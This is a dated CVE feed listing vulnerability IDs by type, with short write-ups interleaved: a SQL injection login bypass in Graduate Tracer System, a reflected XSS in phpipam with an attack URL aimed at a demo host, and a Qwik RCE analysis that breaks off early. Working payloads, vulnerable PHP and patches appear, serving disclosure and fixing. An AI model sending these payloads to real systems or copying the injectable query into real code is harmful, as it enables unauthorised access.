datetime subject id link
2023-03-21 00:00:01.939276 (PHP) CVE-2023-28426 https://cve.report/CVE-2023-28426
2023-03-21 01:00:02.567790 (GitHub, XSS) CVE-2023-1517 https://cve.report/CVE-2023-1517
2023-03-21 01:00:02.568369 (GitHub, XSS) CVE-2023-1515 https://cve.report/CVE-2023-1515
2023-03-21 02:00:02.960611 (WordPress, Wordpress Plugin) CVE-2023-0940 https://cve.report/CVE-2023-0940
2023-03-21 02:00:02.961153 (WordPress, Wordpress Plugin) CVE-2023-0937 https://cve.report/CVE-2023-0937
2023-03-21 02:00:02.961665 (WordPress, Wordpress Plugin) CVE-2023-0911 https://cve.report/CVE-2023-0911
2023-03-21 02:00:02.962210 (WordPress, Wordpress Plugin) CVE-2023-0890 https://cve.report/CVE-2023-0890
2023-03-21 02:00:02.962699 (WordPress, Wordpress Plugin) CVE-2023-0876 https://cve.report/CVE-2023-0876
2023-03-21 02:00:02.963215 (WordPress, SQL injection, Wordpress Plugin) CVE-2023-0875 https://cve.report/CVE-2023-0875
2023-03-21 02:00:02.963730 (WordPress, Wordpress Plugin) CVE-2023-0865 https://cve.report/CVE-2023-0865
2023-03-21 02:00:02.964296 (WordPress, Wordpress Plugin) CVE-2023-0631 https://cve.report/CVE-2023-0631
2023-03-21 02:00:02.964802 (WordPress, Wordpress Plugin) CVE-2023-0630 https://cve.report/CVE-2023-0630
2023-03-21 02:00:02.965304 (WordPress, Wordpress Plugin) CVE-2023-0370 https://cve.report/CVE-2023-0370
2023-03-21 02:00:02.965818 (WordPress, Wordpress Plugin) CVE-2023-0369 https://cve.report/CVE-2023-0369
2023-03-21 02:00:02.966323 (WordPress, Wordpress Plugin) CVE-2023-0365 https://cve.report/CVE-2023-0365
2023-03-21 02:00:02.966837 (WordPress, Wordpress Plugin) CVE-2023-0364 https://cve.report/CVE-2023-0364
2023-03-21 02:00:02.967379 (WordPress, PHP, Wordpress Plugin) CVE-2023-0340 https://cve.report/CVE-2023-0340
2023-03-21 02:00:02.967931 (WordPress, Wordpress Plugin) CVE-2023-0273 https://cve.report/CVE-2023-0273
2023-03-21 02:00:02.968433 (WordPress, Wordpress Plugin) CVE-2023-0175 https://cve.report/CVE-2023-0175
2023-03-21 02:00:02.968942 (WordPress, Wordpress Plugin) CVE-2023-0167 https://cve.report/CVE-2023-0167
2023-03-21 02:00:02.969438 (WordPress, Wordpress Plugin) CVE-2023-0145 https://cve.report/CVE-2023-0145
2023-03-21 02:00:02.969944 (WordPress, Wordpress Plugin) CVE-2022-4148 https://cve.report/CVE-2022-4148
2023-03-21 02:00:02.970445 (WordPress, Wordpress Plugin) CVE-2022-3894 https://cve.report/CVE-2022-3894
2023-03-21 06:00:03.261363 (redis) CVE-2023-28425 https://cve.report/CVE-2023-28425
2023-03-21 10:00:02.465601 (GitHub, XSS) CVE-2023-1527 https://cve.report/CVE-2023-1527
2023-03-21 14:00:02.364631 (GitHub) CVE-2023-1543 https://cve.report/CVE-2023-1543
2023-03-21 14:00:02.365194 (GitHub) CVE-2023-1542 https://cve.report/CVE-2023-1542
2023-03-21 14:00:02.365712 (GitHub) CVE-2023-1541 https://cve.report/CVE-2023-1541
2023-03-21 14:00:02.366242 (GitHub) CVE-2023-1539 https://cve.report/CVE-2023-1539
2023-03-21 14:00:02.366756 (GitHub) CVE-2023-1538 https://cve.report/CVE-2023-1538
2023-03-21 14:00:02.367291 (GitHub) CVE-2023-1537 https://cve.report/CVE-2023-1537
2023-03-21 14:00:02.367806 (GitHub, XSS) CVE-2023-1536 https://cve.report/CVE-2023-1536
2023-03-21 14:00:02.368407 (GitHub, XSS) CVE-2023-1535 https://cve.report/CVE-2023-1535
2023-03-21 14:00:02.368912 (GitHub) CVE-2023-1540 https://cve.report/CVE-2023-1540
2023-03-21 16:00:02.847677 (Remote Code Execution, Critical) CVE-2023-27980 https://cve.report/CVE-2023-27980
2023-03-21 16:00:02.848283 (XSS) CVE-2022-42485 https://cve.report/CVE-2022-42485
2023-03-21 17:00:01.961586 (Remote Code Execution) CVE-2023-27982 https://cve.report/CVE-2023-27982
2023-03-21 18:00:02.060118 (Remote Code Execution) CVE-2023-27978 https://cve.report/CVE-2023-27978
2023-03-21 19:00:02.561340 (Remote Code Execution) CVE-2023-27981 https://cve.report/CVE-2023-27981
2023-03-21 20:00:02.847672 (Remote Code Execution) CVE-2023-27984 https://cve.report/CVE-2023-27984
2023-03-21 20:00:02.849362 (GitHub, SQL injection) CVE-2023-1545 https://cve.report/CVE-2023-1545
2023-03-21 22:00:02.363139 (XSS) CVE-2023-1154 https://cve.report/CVE-2023-1154
2023-03-21 22:00:02.363887 (SQL injection) CVE-2023-1153 https://cve.report/CVE-2023-1153
datetime subject id link
2023-03-20 02:00:02.862956 (GitHub, XSS) CVE-2023-1496 https://cve.report/CVE-2023-1496
2023-03-20 05:00:02.848560 (PHP, Critical, File Upload) CVE-2023-1497 https://cve.report/CVE-2023-1497
2023-03-20 06:00:02.065063 (PHP, Critical) CVE-2023-1501 https://cve.report/CVE-2023-1501
2023-03-20 06:00:02.065593 (PHP) CVE-2023-1500 https://cve.report/CVE-2023-1500
2023-03-20 06:00:02.066110 (PHP, SQL injection, Critical) CVE-2023-1499 https://cve.report/CVE-2023-1499
2023-03-20 06:00:02.066618 (PHP, SQL injection, Critical) CVE-2023-1498 https://cve.report/CVE-2023-1498
2023-03-20 15:00:02.973068 (PHP, SQL injection, Critical) CVE-2022-4933 https://cve.report/CVE-2022-4933
2023-03-20 19:00:02.560027 (PHP, SQL injection, Critical) CVE-2023-1505 https://cve.report/CVE-2023-1505
2023-03-20 19:00:02.560591 (SQL injection, Critical) CVE-2023-1504 https://cve.report/CVE-2023-1504
2023-03-20 19:00:02.561112 (PHP, SQL injection, Critical) CVE-2023-1503 https://cve.report/CVE-2023-1503
2023-03-20 19:00:02.561649 (PHP, SQL injection, Critical) CVE-2023-1502 https://cve.report/CVE-2023-1502
2023-03-20 19:00:02.562223 (XSS) CVE-2023-1248 https://cve.report/CVE-2023-1248
2023-03-20 20:00:02.968586 (PHP) CVE-2023-1507 https://cve.report/CVE-2023-1507
2023-03-20 20:00:02.969119 (PHP, SQL injection, Critical) CVE-2023-1506 https://cve.report/CVE-2023-1506
2023-03-20 21:00:02.359671 (XSS) CVE-2023-25795 https://cve.report/CVE-2023-25795
2023-03-20 21:00:02.360216 (XSS) CVE-2023-25794 https://cve.report/CVE-2023-25794
2023-03-20 21:00:02.360715 (XSS) CVE-2023-25064 https://cve.report/CVE-2023-25064
2023-03-20 21:00:02.361190 (XSS) CVE-2023-24381 https://cve.report/CVE-2023-24381
2023-03-20 22:00:02.460840 (XSS) CVE-2023-23718 https://cve.report/CVE-2023-23718
2023-03-20 22:00:02.461344 (XSS) CVE-2023-22682 https://cve.report/CVE-2023-22682
2023-03-20 22:00:02.461847 (XSS) CVE-2023-22680 https://cve.report/CVE-2023-22680
2023-03-20 22:00:02.462332 (XSS) CVE-2023-22679 https://cve.report/CVE-2023-22679
2023-03-20 22:00:02.462866 (XSS) CVE-2022-47592 https://cve.report/CVE-2022-47592
2023-03-20 23:00:02.763652 (XSS) CVE-2023-0320 https://cve.report/CVE-2023-0320
2023-03-20 23:00:02.764303 (SQL injection) CVE-2023-28424 https://cve.report/CVE-2023-28424
2023-03-20 23:00:02.764866 (XSS) CVE-2022-47591 https://cve.report/CVE-2022-47591
datetime subject id link
2023-03-19 04:00:03.077256 (XSS) CVE-2023-28607 https://cve.report/CVE-2023-28607
2023-03-19 04:00:03.077709 (XSS) CVE-2023-28606 https://cve.report/CVE-2023-28606
2023-03-19 07:00:02.460821 (PHP) CVE-2023-1485 https://cve.report/CVE-2023-1485
2023-03-19 08:00:02.360192 (Critical) CVE-2023-1491 https://cve.report/CVE-2023-1491
2023-03-19 08:00:02.360701 (Critical) CVE-2023-1490 https://cve.report/CVE-2023-1490
2023-03-19 08:00:02.361227 (Critical) CVE-2023-1489 https://cve.report/CVE-2023-1489
2023-03-19 09:00:03.169107 (PHP, SQL injection, Critical) CVE-2023-1494 https://cve.report/CVE-2023-1494
2023-03-19 10:00:02.471809 (SQL injection, Critical) CVE-2023-1495 https://cve.report/CVE-2023-1495
2023-03-19 11:00:03.133302 (PHP, SQL injection) CVE-2023-26905 https://cve.report/CVE-2023-26905
2023-03-19 13:00:02.661981 (Arbitrary Command) CVE-2023-28617 https://cve.report/CVE-2023-28617
datetime subject id link
2023-03-18 00:00:05.272886 (WordPress, SQL injection) CVE-2023-1471 https://cve.report/CVE-2023-1471
2023-03-18 00:00:05.273781 (WordPress) CVE-2023-1470 https://cve.report/CVE-2023-1470
2023-03-18 00:00:05.274610 (XSS) CVE-2022-45817 https://cve.report/CVE-2022-45817
2023-03-18 00:00:05.275285 (XSS) CVE-2022-45814 https://cve.report/CVE-2022-45814
2023-03-18 00:00:05.276098 (XSS) CVE-2022-43461 https://cve.report/CVE-2022-43461
2023-03-18 01:00:03.379755 (PHP, SQL injection, Critical) CVE-2023-1475 https://cve.report/CVE-2023-1475
2023-03-18 01:00:03.380388 (PHP, SQL injection, Critical) CVE-2023-1474 https://cve.report/CVE-2023-1474
2023-03-18 01:00:03.455022 (WordPress) CVE-2023-1472 https://cve.report/CVE-2023-1472
2023-03-18 06:00:05.680116 (Kubernetes) CVE-2023-27593 https://cve.report/CVE-2023-27593
2023-03-18 07:54:04.238858 (Remote Code Execution, Laravel, PHP) CVE-2023-28115 https://cve.report/CVE-2023-28115
2023-03-18 07:54:04.239418 (Kubernetes) CVE-2023-27595 https://cve.report/CVE-2023-27595
2023-03-18 07:54:04.239972 (Command Injection, Arbitrary Command) CVE-2023-27253 https://cve.report/CVE-2023-27253
2023-03-18 14:00:03.263511 (Squid, XSS) CVE-2023-24278 https://cve.report/CVE-2023-24278
2023-03-18 19:00:02.658682 (PHP) CVE-2023-1481 https://cve.report/CVE-2023-1481
2023-03-18 19:00:02.659181 (PHP, SQL injection, Critical) CVE-2023-1480 https://cve.report/CVE-2023-1480
2023-03-18 19:00:02.659678 (PHP, Critical) CVE-2023-1479 https://cve.report/CVE-2023-1479
2023-03-18 20:00:02.867187 (Critical) CVE-2023-1484 https://cve.report/CVE-2023-1484
2023-03-18 20:00:02.867698 (SQL injection, Critical) CVE-2023-1483 https://cve.report/CVE-2023-1483
2023-03-18 20:00:02.868245 (PHP, Code Injection) CVE-2023-1482 https://cve.report/CVE-2023-1482

ref

Background

  • Graduate Tracer System is a system for managing student academic records.
  • A SQLi vulnerability was found in Graduate Tracer System 1.0. Affected is a function in the file admin/adminlog.php. When a user manipulates a parameter, SQL injection occurs. The attack can be carried out remotely, and the vulnerability allows access and command execution with administrator privileges. An exploit for the vulnerability has been made public.

Analysis

  • This program is based on phpstudy 8.1.1.3.
  • Vulnerability File: tracking/admin/adminlog.php
  • Vulnerability location: tracking/admin/adminlog.php user
  • The user parameter used at login can be attacked with a payload ([+] Payload: user=*).

Test

  1. Open the administrator login page.
  2. Enter the payload admin%27 '1'='1 in the ID field.
  3. The vulnerability arises because no prepared statement is used and the parameter is taken straight into the query string as a variable: sql = select * from xxx where user = 'admin' or '1'='1' and xxx
<?php
include('dbcon.php');
session_start();
if (isset($_POST['submit'])) {
    $user = $_POST['user'];
    $password = sha1($_POST['password']);

    // user-controlled $user is interpolated straight into the SQL text
    $sql = "select * from adminuser where user = '$user' and password = '$password'";
    $result = mysqli_query($conn, $sql);
    if ($result->num_rows > 0) {
        $row = mysqli_fetch_assoc($result);
        $_SESSION['id'] = $row['id'];
        header("Location:homead.php");
    } else {
        echo "<script>alert('Mali!! ang iyong user o password na nalagay paki-ulit muli.')</script>";
    }
}
?>

Patch method

  • No patch is provided.
  • Switch to a prepared statement and redeploy.
$stmt = $conn->prepare("select * from adminuser where user = ? and password = ?");
$stmt->bind_param("ss", $user, $password);
$stmt->execute();
$result = $stmt->get_result();
datetime subject id link
2023-03-17 01:00:03.375156 (Remote Attack) CVE-2023-27789 https://cve.report/CVE-2023-27789
2023-03-17 01:00:03.375726 (Remote Attack) CVE-2023-27788 https://cve.report/CVE-2023-27788
2023-03-17 01:00:03.376233 (Remote Attack) CVE-2023-27787 https://cve.report/CVE-2023-27787
2023-03-17 01:00:03.376771 (Remote Attack) CVE-2023-27786 https://cve.report/CVE-2023-27786
2023-03-17 01:00:03.377284 (Remote Attack) CVE-2023-27785 https://cve.report/CVE-2023-27785
2023-03-17 01:00:03.377797 (Remote Attack) CVE-2023-27784 https://cve.report/CVE-2023-27784
2023-03-17 01:00:03.378317 (Remote Attack) CVE-2023-27783 https://cve.report/CVE-2023-27783
2023-03-17 01:00:03.378834 (Remote Attack, PHP) CVE-2023-27711 https://cve.report/CVE-2023-27711
2023-03-17 01:00:03.379339 (Remote Attack, PHP, SQL injection) CVE-2023-27709 https://cve.report/CVE-2023-27709
2023-03-17 01:00:03.379859 (Remote Attack, PHP, SQL injection) CVE-2023-27707 https://cve.report/CVE-2023-27707
2023-03-17 01:00:03.380362 (Remote Attack) CVE-2023-27131 https://cve.report/CVE-2023-27131
2023-03-17 01:00:03.380876 (Remote Attack) CVE-2023-27130 https://cve.report/CVE-2023-27130
2023-03-17 01:00:03.381375 (Remote Code Execution, PHP) CVE-2023-27037 https://cve.report/CVE-2023-27037
2023-03-17 01:00:03.381894 (Remote Attack) CVE-2023-26769 https://cve.report/CVE-2023-26769
2023-03-17 01:00:03.455557 (Remote Attack) CVE-2023-26768 https://cve.report/CVE-2023-26768
2023-03-17 01:00:03.456167 (Remote Attack) CVE-2023-26767 https://cve.report/CVE-2023-26767
2023-03-17 02:00:03.599063 (GraphQL) CVE-2023-28104 https://cve.report/CVE-2023-28104
2023-03-17 02:00:03.599937 (Remote Code Execution) CVE-2023-27040 https://cve.report/CVE-2023-27040
2023-03-17 03:00:04.665399 (Docker) CVE-2023-28109 https://cve.report/CVE-2023-28109
2023-03-17 03:00:04.666091 (PHP, SQL injection) CVE-2023-27041 https://cve.report/CVE-2023-27041
2023-03-17 03:00:04.666687 (Kubernetes) CVE-2023-28110 https://cve.report/CVE-2023-28110
2023-03-17 06:00:05.259798 (Code Injection) CVE-2023-0598 https://cve.report/CVE-2023-0598
2023-03-17 07:00:04.967244 (XSS) CVE-2023-27494 https://cve.report/CVE-2023-27494
2023-03-17 07:00:04.969417 (Remote Code Execution) CVE-2022-43605 https://cve.report/CVE-2022-43605
2023-03-17 07:00:04.970018 (Remote Code Execution) CVE-2022-43604 https://cve.report/CVE-2022-43604
2023-03-17 07:00:04.970580 (sqlite) CVE-2022-43441 https://cve.report/CVE-2022-43441
2023-03-17 08:00:07.178085 (XSS) CVE-2023-27059 https://cve.report/CVE-2023-27059
2023-03-17 14:00:04.465122 (OpenSSH) CVE-2023-28531 https://cve.report/CVE-2023-28531
2023-03-17 17:00:05.775902 (PHP, SQL injection, Critical) CVE-2023-1455 https://cve.report/CVE-2023-1455
2023-03-17 17:00:05.776520 (SQL injection, Critical) CVE-2023-1454 https://cve.report/CVE-2023-1454
2023-03-17 17:00:05.777117 (Critical) CVE-2023-1453 https://cve.report/CVE-2023-1453
2023-03-17 17:00:05.777741 (Critical) CVE-2023-1452 https://cve.report/CVE-2023-1452
2023-03-17 17:00:05.855049 (Critical) CVE-2023-1444 https://cve.report/CVE-2023-1444
2023-03-17 17:00:05.855813 (PHP) CVE-2023-1442 https://cve.report/CVE-2023-1442
2023-03-17 17:00:05.856393 (PHP, SQL injection, Critical) CVE-2023-1441 https://cve.report/CVE-2023-1441
2023-03-17 17:00:05.857352 (PHP, SQL injection, Critical) CVE-2023-1440 https://cve.report/CVE-2023-1440
2023-03-17 17:00:05.858000 (PHP, SQL injection, Critical) CVE-2023-1439 https://cve.report/CVE-2023-1439
2023-03-17 18:00:05.672265 (PHP, Critical) CVE-2023-1460 https://cve.report/CVE-2023-1460
2023-03-17 18:00:05.673872 (PHP, SQL injection, Critical) CVE-2023-1459 https://cve.report/CVE-2023-1459
2023-03-17 19:00:04.374013 (PHP, SQL injection, Critical) CVE-2023-1461 https://cve.report/CVE-2023-1461
2023-03-17 19:00:04.374641 (SQL injection) CVE-2023-1152 https://cve.report/CVE-2023-1152
2023-03-17 21:00:06.073189 (GitHub) CVE-2023-1463 https://cve.report/CVE-2023-1463
2023-03-17 22:00:04.778266 (SQL injection, Critical) CVE-2023-1468 https://cve.report/CVE-2023-1468
2023-03-17 22:00:04.778911 (PHP, Critical) CVE-2023-1467 https://cve.report/CVE-2023-1467
2023-03-17 22:00:04.854546 (SQL injection, Critical) CVE-2023-1466 https://cve.report/CVE-2023-1466
2023-03-17 22:00:04.855390 (PHP, Critical) CVE-2023-1464 https://cve.report/CVE-2023-1464
2023-03-17 23:00:04.871377 (WordPress) CVE-2023-1469 https://cve.report/CVE-2023-1469
2023-03-17 23:00:04.872051 (WordPress) CVE-2023-1172 https://cve.report/CVE-2023-1172
datetime subject id link
2023-03-16 00:00:05.676810 (Apache Tomcat) CVE-2023-0100 https://cve.report/CVE-2023-0100
2023-03-16 00:00:05.677639 (SQL injection) CVE-2023-24732 https://cve.report/CVE-2023-24732
2023-03-16 00:00:05.678085 (SQL injection) CVE-2023-24731 https://cve.report/CVE-2023-24731
2023-03-16 00:00:05.678791 (SQL injection) CVE-2023-24730 https://cve.report/CVE-2023-24730
2023-03-16 00:00:05.679308 (SQL injection) CVE-2023-24729 https://cve.report/CVE-2023-24729
2023-03-16 00:00:05.679947 (SQL injection) CVE-2023-24728 https://cve.report/CVE-2023-24728
2023-03-16 00:00:05.754858 (SQL injection) CVE-2023-24726 https://cve.report/CVE-2023-24726
2023-03-16 01:00:03.095222 (SQL injection) CVE-2022-44580 https://cve.report/CVE-2022-44580
2023-03-16 02:00:03.060054 (PHP) CVE-2023-1418 https://cve.report/CVE-2023-1418
2023-03-16 02:00:03.060588 (PHP, SQL injection, Critical) CVE-2023-1416 https://cve.report/CVE-2023-1416
2023-03-16 02:00:03.061097 (PHP, Critical) CVE-2023-1415 https://cve.report/CVE-2023-1415
2023-03-16 02:00:03.061628 (PHP, SQL injection, Critical) CVE-2023-1379 https://cve.report/CVE-2023-1379
2023-03-16 02:00:03.062125 (XSS) CVE-2022-37402 https://cve.report/CVE-2022-37402
2023-03-16 04:00:04.571689 (nginx) CVE-2023-25804 https://cve.report/CVE-2023-25804
2023-03-16 04:00:04.572155 (Command Injection) CVE-2023-24229 https://cve.report/CVE-2023-24229
2023-03-16 06:00:06.078321 (XSS) CVE-2023-26912 https://cve.report/CVE-2023-26912
2023-03-16 07:00:06.163612 (Kubernetes, Critical) CVE-2023-26484 https://cve.report/CVE-2023-26484
2023-03-16 09:00:06.355160 (Remote Code Execution) CVE-2023-28461 https://cve.report/CVE-2023-28461
2023-03-16 09:00:06.356189 (Command Injection, Remote Attack) CVE-2023-28460 https://cve.report/CVE-2023-28460
2023-03-16 09:00:06.358310 (Command Injection) CVE-2023-1389 https://cve.report/CVE-2023-1389
2023-03-16 09:00:06.358937 (Arbitrary Command) CVE-2022-4313 https://cve.report/CVE-2022-4313
2023-03-16 11:00:05.857071 (XSS) CVE-2023-26951 https://cve.report/CVE-2023-26951
2023-03-16 11:00:05.857683 (Command Injection) CVE-2023-25280 https://cve.report/CVE-2023-25280
2023-03-16 12:00:07.555624 (PHP, SQL injection) CVE-2023-26784 https://cve.report/CVE-2023-26784
2023-03-16 12:00:07.556107 (Command Execution) CVE-2023-24795 https://cve.report/CVE-2023-24795
2023-03-16 12:00:07.556611 (Remote Attack) CVE-2023-24760 https://cve.report/CVE-2023-24760
2023-03-16 19:00:04.877055 (XSS) CVE-2022-40699 https://cve.report/CVE-2022-40699
2023-03-16 19:00:04.877582 (XSS) CVE-2022-38971 https://cve.report/CVE-2022-38971
2023-03-16 20:00:05.179500 (XSS) CVE-2022-41554 https://cve.report/CVE-2022-41554
2023-03-16 22:00:04.871453 (GitHub, XSS) CVE-2023-1429 https://cve.report/CVE-2023-1429
2023-03-16 22:00:04.872009 (Arbitrary Command) CVE-2023-24671 https://cve.report/CVE-2023-24671
2023-03-16 23:00:04.968759 (PHP, SQL injection) CVE-2023-27250 https://cve.report/CVE-2023-27250
2023-03-16 23:00:04.969330 (PHP) CVE-2023-1433 https://cve.report/CVE-2023-1433
2023-03-16 23:00:04.969910 (PHP, Critical) CVE-2023-1432 https://cve.report/CVE-2023-1432
2023-03-16 23:00:04.970505 (WordPress) CVE-2023-1431 https://cve.report/CVE-2023-1431

ref

Background

  • phpipam is an open-source web IP address management application.
  • In phpipam v1.5 a parameter vulnerable to reflected cross-site scripting was found. The parameter is closeClass, in the /subnet-masks/popup.php entry point.

Analysis

Test

  1. Log in.
  2. After logging in, request the attack URL below.
https://demo.phpipam.net/app/tools/subnet-masks/popup.php?closeClass="><script>alert("XSS")</script>

<!-- footer -->
<div class="pFooter">
	<div class="btn-group">
		<button class="btn btn-sm btn-default <?php print @$_REQUEST['closeClass']; ?>"><?php print _('Close'); ?></button>
	</div>
</div>
  • When the attack code is sent, the browser response is as follows.
<!-- footer -->
<div class="pFooter">
	<div class="btn-group">
		<button class="btn btn-sm btn-default "><script>alert("XSS")</script>">Close</button>
	</div>
</div>

Patch method
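The post leaves this section empty, so here is an added example (not phpipam's code or its fix) of what a patch has to change: popup.php prints the request value straight into an attribute, and the JavaScript below renders the same footer button three ways. The vulnerable form reproduces the response above; the escaped form neutralises the quote and angle brackets; the hardened form first checks that closeClass is actually a CSS class list, which is the right fix for a value that is never supposed to contain markup. Function names and the class-name pattern are this example's own.

```javascript
// Added example, not phpipam code: closeClass rendering, vulnerable and fixed.

// Escape the five characters that break out of attribute values or text.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// closeClass is meant to be one or more CSS class names, so allowlist that
// shape (letters, digits, hyphen, underscore, single spaces) and drop
// anything else. Assumed pattern; tighten it to the classes the page uses.
const CLASS_LIST = /^[A-Za-z0-9_-]+(?: [A-Za-z0-9_-]+)*$/;
function safeClassList(s) {
  return CLASS_LIST.test(String(s)) ? String(s) : "";
}

// Mirrors: <button class="btn btn-sm btn-default <?php print @$_REQUEST['closeClass']; ?>">
function renderFooterVulnerable(closeClass) {
  return `<button class="btn btn-sm btn-default ${closeClass}">Close</button>`;
}

// Escaping alone stops the breakout but still lets arbitrary class names in.
function renderFooterEscaped(closeClass) {
  return `<button class="btn btn-sm btn-default ${escapeHtml(closeClass)}">Close</button>`;
}

// Allowlist first, escape second: the value can only ever be a class list,
// and the escape is kept as defence in depth if the pattern is loosened later.
function renderFooterHardened(closeClass) {
  return `<button class="btn btn-sm btn-default ${escapeHtml(safeClassList(closeClass))}">Close</button>`;
}

module.exports = { escapeHtml, safeClassList, renderFooterVulnerable, renderFooterEscaped, renderFooterHardened };
```

With the payload from the test section, `renderFooterVulnerable` returns exactly the button line shown in the response above, `renderFooterEscaped` returns it with `&lt;script&gt;` in place of the tag, and `renderFooterHardened` returns a button with no extra class at all.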

datetime subject id link
2023-03-15 01:00:03.629320 (SQL injection) CVE-2023-27074 https://cve.report/CVE-2023-27074
2023-03-15 01:00:03.629865 (Critical) CVE-2023-1398 https://cve.report/CVE-2023-1398
2023-03-15 01:00:03.630307 (PHP) CVE-2023-1397 https://cve.report/CVE-2023-1397
2023-03-15 01:00:03.630776 (PHP) CVE-2023-1396 https://cve.report/CVE-2023-1396
2023-03-15 01:00:03.631229 (PHP) CVE-2023-1395 https://cve.report/CVE-2023-1395
2023-03-15 01:00:03.631665 (MySQL, PHP, SQL injection, Critical) CVE-2023-1394 https://cve.report/CVE-2023-1394
2023-03-15 01:00:03.632155 (Critical) CVE-2023-1392 https://cve.report/CVE-2023-1392
2023-03-15 01:00:03.632568 (PHP) CVE-2023-1391 https://cve.report/CVE-2023-1391
2023-03-15 02:00:03.310142 (XSS) CVE-2023-27070 https://cve.report/CVE-2023-27070
2023-03-15 02:00:03.310566 (XSS) CVE-2023-27069 https://cve.report/CVE-2023-27069
2023-03-15 03:00:04.001083 (Remote Code Execution) CVE-2023-24913 https://cve.report/CVE-2023-24913
2023-03-15 03:00:04.002028 (Remote Code Execution) CVE-2023-24907 https://cve.report/CVE-2023-24907
2023-03-15 03:00:04.002765 (Remote Code Execution) CVE-2023-24872 https://cve.report/CVE-2023-24872
2023-03-15 03:00:04.003239 (Remote Code Execution) CVE-2023-24869 https://cve.report/CVE-2023-24869
2023-03-15 03:00:04.003687 (Remote Code Execution) CVE-2023-24867 https://cve.report/CVE-2023-24867
2023-03-15 03:00:04.004528 (Remote Code Execution) CVE-2023-24909 https://cve.report/CVE-2023-24909
2023-03-15 03:00:04.004984 (Remote Code Execution) CVE-2023-24908 https://cve.report/CVE-2023-24908
2023-03-15 03:00:04.005456 (Remote Code Execution) CVE-2023-24876 https://cve.report/CVE-2023-24876
2023-03-15 03:00:04.005888 (Remote Code Execution) CVE-2023-24871 https://cve.report/CVE-2023-24871
2023-03-15 03:00:04.006270 (Remote Code Execution) CVE-2023-24868 https://cve.report/CVE-2023-24868
2023-03-15 03:00:04.006999 (SQL injection) CVE-2023-25206 https://cve.report/CVE-2023-25206
2023-03-15 03:00:04.007473 (Remote Code Execution) CVE-2023-23416 https://cve.report/CVE-2023-23416
2023-03-15 03:00:04.007902 (Remote Code Execution) CVE-2023-23415 https://cve.report/CVE-2023-23415
2023-03-15 03:00:04.008284 (Remote Code Execution) CVE-2023-23414 https://cve.report/CVE-2023-23414
2023-03-15 03:00:04.008644 (Remote Code Execution) CVE-2023-23413 https://cve.report/CVE-2023-23413
2023-03-15 03:00:04.009174 (HTTP.sys) CVE-2023-23410 https://cve.report/CVE-2023-23410
2023-03-15 03:00:04.009589 (Azure) CVE-2023-23408 https://cve.report/CVE-2023-23408
2023-03-15 03:00:04.010008 (Remote Code Execution) CVE-2023-23407 https://cve.report/CVE-2023-23407
2023-03-15 03:00:04.010382 (Remote Code Execution) CVE-2023-23406 https://cve.report/CVE-2023-23406
2023-03-15 03:00:04.010783 (Remote Code Execution) CVE-2023-23405 https://cve.report/CVE-2023-23405
2023-03-15 03:00:04.011189 (Remote Code Execution) CVE-2023-23404 https://cve.report/CVE-2023-23404
2023-03-15 03:00:04.011549 (Remote Code Execution) CVE-2023-23403 https://cve.report/CVE-2023-23403
2023-03-15 03:00:04.011969 (Remote Code Execution) CVE-2023-23402 https://cve.report/CVE-2023-23402
2023-03-15 03:00:04.012334 (Remote Code Execution) CVE-2023-23401 https://cve.report/CVE-2023-23401
2023-03-15 03:00:04.012688 (Remote Code Execution) CVE-2023-23400 https://cve.report/CVE-2023-23400
2023-03-15 03:00:04.013109 (Remote Code Execution) CVE-2023-23399 https://cve.report/CVE-2023-23399
2023-03-15 03:00:04.013773 (Remote Code Execution) CVE-2023-23392 https://cve.report/CVE-2023-23392
2023-03-15 03:00:04.014393 (Remote Code Execution) CVE-2023-21708 https://cve.report/CVE-2023-21708
2023-03-15 04:00:04.620937 (GraphQL) CVE-2023-27588 https://cve.report/CVE-2023-27588
2023-03-15 06:00:06.518784 (Command Injection, PHP) CVE-2023-28343 https://cve.report/CVE-2023-28343
2023-03-15 12:00:06.775986 (Remote Attack, PHP) CVE-2023-26511 https://cve.report/CVE-2023-26511
2023-03-15 12:00:06.776503 (File Upload) CVE-2023-26262 https://cve.report/CVE-2023-26262
2023-03-15 13:00:04.773870 (File Upload) CVE-2023-27757 https://cve.report/CVE-2023-27757
2023-03-15 15:00:04.972524 (PHP, File Upload) CVE-2023-27235 https://cve.report/CVE-2023-27235
2023-03-15 16:00:06.079322 (Command Injection) CVE-2023-27240 https://cve.report/CVE-2023-27240
2023-03-15 18:00:05.173922 (PHP, SQL injection, Critical) CVE-2023-1407 https://cve.report/CVE-2023-1407
2023-03-15 21:00:07.066053 (WordPress, Wordpress Plugin) CVE-2023-25708 https://cve.report/CVE-2023-25708
2023-03-15 22:00:04.554644 (XSS) CVE-2023-0322 https://cve.report/CVE-2023-0322

ref

https://cve.report/CVE-2023-1283

https://huntr.dev/bounties/63f1ff91-48f3-4886-a179-103f1ddd8ff8/

Background

Services built on Qwik (https://github.com/BuilderIO/qwik), a NodeJS-based framework, are open to pre-auth remote command execution when the Qwik version is 0.20.1 or lower.

Analysis

  • The analysis was done on the vulnerable version, 0.20.1.
  • Qwik's middleware request handlers are registered in the following order:
    • POST: securityMiddleware ⇒ pureServerFunction ⇒ fixTrailingSlash ⇒ renderQData
    • GET: fixTrailingSlash ⇒ renderQData
// packages/qwik-city/middleware/request-handler/resolve-request-handlers.ts
var resolveRequestHandlers = (serverPlugins, route, method, renderHandler) => {
  const routeLoaders = [];
  const routeActions = [];
  const requestHandlers = [];
  const isPageRoute = !!(route && isLastModulePageRoute(route[1]));

  if (serverPlugins) {
    _resolveRequestHandlers(
      routeLoaders,
      routeActions,
      requestHandlers,
      serverPlugins,
      isPageRoute,
      method
    );
  }
  if (route) {
    if (isPageRoute) {
      if (method === "POST") {
        requestHandlers.unshift(securityMiddleware);
        requestHandlers.push(pureServerFunction);
      }
      requestHandlers.push(fixTrailingSlash);
      requestHandlers.push(renderQData);
    }
    _resolveRequestHandlers(
      routeLoaders,
      routeActions,
      requestHandlers,
      route[1],
      isPageRoute,
      method
    );
    if (isPageRoute) {
      if (routeLoaders.length + actionsMiddleware.length > 0) {
        requestHandlers.push(actionsMiddleware(routeLoaders, routeActions));
      }
      requestHandlers.push(renderHandler);
    }
  }
  return requestHandlers;
};
  • The securityMiddleware function checks the following condition to prevent CSRF:
    • request.headers.get("origin") == url.origin
function securityMiddleware({ url, request, error }) {
  const forbidden = request.headers.get("origin") !== url.origin;
  if (forbidden) {
    throw error(403, `Cross-site ${request.method} form submissions are forbidden`);
  }
}
